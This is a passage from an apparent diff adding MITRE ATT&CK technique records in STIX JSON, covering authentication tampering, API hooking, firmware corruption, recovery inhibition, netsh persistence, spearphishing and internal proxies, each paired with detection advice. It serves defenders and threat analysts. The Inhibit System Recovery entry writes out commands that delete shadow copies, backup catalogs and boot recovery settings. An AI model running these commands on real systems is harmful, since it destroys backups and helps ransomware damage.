Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "created": "2020-10-01T02:17:46.086Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588/005", + "external_id": "T1588.005" + }, + { + "source_name": "Exploit Database", + "description": "Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020.", + "url": "https://www.exploit-db.com/" + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + }, + { + "source_name": "PegasusCitizenLab", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" + }, + { + "source_name": "Wired SandCat Oct 2019", + "description": "Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020.", + "url": "https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-11T21:51:44.851Z", + "name": "Modify Authentication Process", + "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Chris Ross @xorrior" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nMonitor property changes in Group Policy that manage authentication mechanisms (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). The Store passwords using reversible encryption configuration should be set to Disabled. Additionally, monitor and/or block suspicious command/script execution of -AllowReversiblePasswordEncryption $true, Set-ADUser and Set-ADAccountControl. Finally, monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "Network", + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "created": "2020-02-11T19:01:56.887Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556", + "external_id": "T1556" + }, + { + "source_name": "Clymb3r Function Hook Passwords Sept 2013", + "description": "Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.", + "url": "https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/" + }, + { + "source_name": "Xorrior Authorization Plugins", + "description": "Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.", + "url": "https://xorrior.com/persistent-credential-theft/" + }, + { + "source_name": "Dell Skeleton", + "description": "Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.", + "url": "https://www.secureworks.com/research/skeleton-key-malware-analysis" + }, + { + "source_name": "dump_pwd_dcsync", + "description": "Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.", + "url": "https://adsecurity.org/?p=2053" + }, + { + "source_name": "TechNet Audit Policy", + "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Credential API Hooking", + "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "created": "2020-02-11T19:01:15.930Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1056/004", + "external_id": "T1056.004" + }, + { + "source_name": "Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017", + "description": "Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918" + }, + { + "source_name": "Microsoft Hook Overview", + "description": "Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "Adlice Software IAT Hooks Oct 2014", + "description": "Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.", + "url": "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/" + }, + { + "source_name": "MWRInfoSecurity Dynamic Hooking 2015", + "description": "Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.", + "url": "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/" + }, + { + "source_name": "HighTech Bridge Inline Hooking Sept 2011", + "description": "Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.", + "url": "https://www.exploit-db.com/docs/17802.pdf" + }, + { + "source_name": "Volatility Detecting Hooks Sept 2012", + "description": "Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.", + "url": "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html" + }, + { + "source_name": "PreKageo Winhook Jul 2011", + "description": "Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.", + "url": "https://github.com/prekageo/winhook" + }, + { + "source_name": "Jay GetHooks Sept 2011", + "description": "Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.", + "url": "https://github.com/jay/gethooks" + }, + { + "source_name": "Zairon Hooking Dec 2006", + "description": "Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.", + "url": "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/" + }, + { + "source_name": "EyeofRa Detecting Hooking June 2017", + "description": "Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.", + "url": "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/" + }, + { + "source_name": "GMER Rootkits", + "description": "GMER. (n.d.). GMER. Retrieved December 12, 2017.", + "url": "http://www.gmer.net/" + }, + { + "source_name": "Microsoft Process Snapshot", + "description": "Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx" + }, + { + "source_name": "StackExchange Hooks Jul 2012", + "description": "Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.", + "url": "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-08-31T17:30:05.440Z", + "name": "Firmware Corruption", + "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "created": "2019-04-12T18:28:15.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1495", + "external_id": "T1495" + }, + { + "source_name": "cisa_malware_orgs_ukraine", + "description": "CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a" + }, + { + "source_name": "dhs_threat_to_net_devices", + "description": "U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.", + "url": "https://cyber.dhs.gov/assets/report/ar-16-20173.pdf" + }, + { + "source_name": "MITRE Trustworthy Firmware Measurement", + "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", + "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + }, + { + "source_name": "Symantec Chernobyl W95.CIH", + "description": "Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.", + "url": "https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T02:30:08.379Z", + "name": "Inhibit System Recovery", + "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no\n* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)\n\nOn network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Yonatan Gotlib, Deep Instinct", + "Austin Clark, @c2defense", + "Pallavi Sivakumaran, WithSecure", + "Joey Lei", + "Harjot Shah Singh" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit, REAgentC, and diskshadow. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).\n\nFor network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Network", + "IaaS", + "Containers" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "created": "2019-04-02T13:54:43.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1490", + "external_id": "T1490" + }, + { + "source_name": "Dark Reading Code Spaces Cyber Attack", + "description": " Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.", + "url": "https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack" + }, + { + "source_name": "FireEye WannaCry 2017", + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Diskshadow", + "description": "Microsoft Windows Server. (2023, February 3). Diskshadow. Retrieved November 21, 2023.", + "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow" + }, + { + "source_name": "Crytox Ransomware", + "description": "Romain Dumont . (2022, September 21). Technical Analysis of Crytox Ransomware. Retrieved November 22, 2023.", + "url": "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware" + }, + { + "source_name": "Rhino Security Labs AWS S3 Ransomware", + "description": "Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.", + "url": "https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/" + }, + { + "source_name": "ZDNet Ransomware Backups 2020", + "description": "Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.", + "url": "https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/" + }, + { + "source_name": "disable_notif_synology_ransom", + "description": "TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022.", + "url": "https://twitter.com/TheDFIRReport/status/1498657590259109894" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Netsh Helper DLL", + "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software.(Citation: Demaske Netsh Persistence)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "created": "2020-01-24T14:26:51.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/007", + "external_id": "T1546.007" + }, + { + "source_name": "Demaske Netsh Persistence", + "description": "Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.", + "url": "https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html" + }, + { + "source_name": "TechNet Netsh", + "description": "Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.", + "url": "https://technet.microsoft.com/library/bb490939.aspx" + }, + { + "source_name": "Github Netsh Helper CS Beacon", + "description": "Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.", + "url": "https://github.com/outflankbv/NetshHelperBeacon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-31T14:15:55.690Z", + "name": "Spearphishing via Service", + "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: Lookout Dark Caracal Jan 2018) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "created": "2020-03-02T19:24:00.951Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1566/003", + "external_id": "T1566.003" + }, + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-07T14:29:02.408Z", + "name": "Internal Proxy", + "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + 